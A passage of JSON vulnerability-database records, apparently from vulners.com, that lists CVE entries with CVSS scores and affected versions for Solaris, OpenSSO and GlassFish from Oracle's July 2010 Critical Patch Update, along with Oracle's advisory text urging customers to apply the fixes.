\tYes \t5.0 \tNetwork \tLow \tNone \tPartial \tNone \tNone \t1.0 \t \r\nCVE-2010-2386 \tSolaris \tNone \tGigaSwift Ethernet Driver \tNo \t4.9 \tLocal \tLow \tNone \tNone \tNone \tComplete \t8, 9, 10, OpenSolaris \t \r\nCVE-2010-2394 \tSolaris \tTCP, UDP \tTCP/IP \tNo \t4.7 \tLocal \tMedium \tNone \tNone \tNone \tComplete \t10 \t \r\nCVE-2010-2399 \tSolaris \tNone \tKernel/VM \tNo \t4.6 \tLocal \tLow \tSingle \tNone \tNone \tComplete \t10, OpenSolaris \t \r\nCVE-2010-2400 \tSolaris \tNone \tKernel/Filesystem \tNo \t4.6 \tLocal \tLow \tSingle \tNone \tNone \tComplete \t9, 10, OpenSolaris \t \r\nCVE-2009-3763 \tAccess Manager / OpenSSO \tHTTP \tAuthentication \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t7.1, 7 2005Q4, OpenSSO Enterprise 8.0 \t \r\nCVE-2009-3764 \tOpenSSO \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \tOpenSSO Enterprise 8.0 \t \r\nCVE-2009-3762 \tOpenSSO \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \tOpenSSO Enterprise 8.0 \t \r\nCVE-2010-2393 \tSolaris \tNone \tKernel/RPC \tNo \t3.8 \tLocal \tHigh \tSingle \tNone \tNone \tComplete \t10, OpenSolaris \t \r\nCVE-2009-0217 \tOpenSSO \tHTTP \tMetro Web Services \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \tOpenSSO Enterprise 8.0 \t \r\nCVE-2010-2376 \tSolaris \tNone \tSolaris Management Console \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t8, 9, 10 \t \r\nCVE-2010-2382 \tSolaris \tNone \tInstall Software \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t8, 9, 10 \t \r\nCVE-2010-2383 \tSolaris \tNone \tNFS \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t8, 9, 10, OpenSolaris \t \r\nCVE-2010-2384 \tSolaris \tNone \tSolaris Management Console \tNo \t3.2 \tLocal \tLow \tSingle \tPartial \tPartial \tNone \t9, 10 \t \r\nCVE-2010-2374 \tSolaris Studio \tNone \tNone \tNo \t3.0 \tLocal \tMedium \tSingle \tPartial \tPartial \tNone \t12 update 1 \t \r\nCVE-2010-2397 \tSun 
GlassFish Enterprise Server, Sun Java System Application Server \tNone \tGUI \tNo \t2.4 \tLocal \tHigh \tSingle \tPartial \tPartial \tNone \tSun Java System Application Server 8.0, 8.1, 8.2, GlassFish Enterprise Server v2.1.1 \t", "edition": 1, "modified": "2010-07-15T00:00:00", "published": "2010-07-15T00:00:00", "id": "SECURITYVULNS:DOC:24227", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24227", "title": "Oracle Critical Patch Update Advisory - July 2010", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2019-05-29T18:21:02", "bulletinFamily": "software", "cvelist": ["CVE-2010-2374", "CVE-2010-0903", "CVE-2010-0892", "CVE-2010-2386", "CVE-2010-0873", "CVE-2010-0913", "CVE-2010-0907", "CVE-2010-0906", "CVE-2010-0088", "CVE-2010-2384", "CVE-2010-2379", "CVE-2009-0217", "CVE-2010-0085", "CVE-2010-0902", "CVE-2010-0087", "CVE-2010-2377", "CVE-2009-3762", "CVE-2010-2376", "CVE-2010-2372", "CVE-2010-0908", "CVE-2010-0092", "CVE-2008-4247", "CVE-2010-0848", "CVE-2010-0914", "CVE-2010-2385", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2397", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-0081", "CVE-2010-2393", "CVE-2010-0898", "CVE-2010-0847", "CVE-2010-2378", "CVE-2010-2401", "CVE-2010-0842", "CVE-2010-0900", "CVE-2010-2398", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-0912", "CVE-2010-0837", "CVE-2010-0835", "CVE-2010-0915", "CVE-2009-3764", "CVE-2010-0910", "CVE-2010-0849", "CVE-2010-2381", "CVE-2010-2371", "CVE-2010-2394", "CVE-2010-0091", "CVE-2010-2380", "CVE-2010-2403", "CVE-2010-0911", "CVE-2010-2392", "CVE-2010-0916", "CVE-2010-2383", "CVE-2010-2370", "CVE-2010-0904", "CVE-2010-2375", "CVE-2010-0909", "CVE-2010-2382", "CVE-2010-0899", "CVE-2010-0083", "CVE-2010-0905", "CVE-2010-2402", "CVE-2010-2400", "CVE-2010-0836", "CVE-2010-0843", "CVE-2009-3763", "CVE-2010-2399", "CVE-2010-0084", 
"CVE-2010-2373", "CVE-2010-0901"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to:\n\nCritical Patch Updates and Security Alerts\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 59 new security fixes across all product families listed below.\n\nOracle is in the process of aligning the Sun Microsystems policies with Oracle Software Security Assurance policies and procedures. For details, please refer to [Changes in security policies for the Sun product lines.](<http://www.oracle.com/technology/deploy/security/changesforsunsecuritypolicies.htm>)\n", "modified": "2010-07-13T00:00:00", "published": "2010-07-13T00:00:00", "id": "ORACLE:CPUJUL2010-155308", "href": "", "type": "oracle", "title": "Security | Oracle Critical Patch Update - July 2010", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}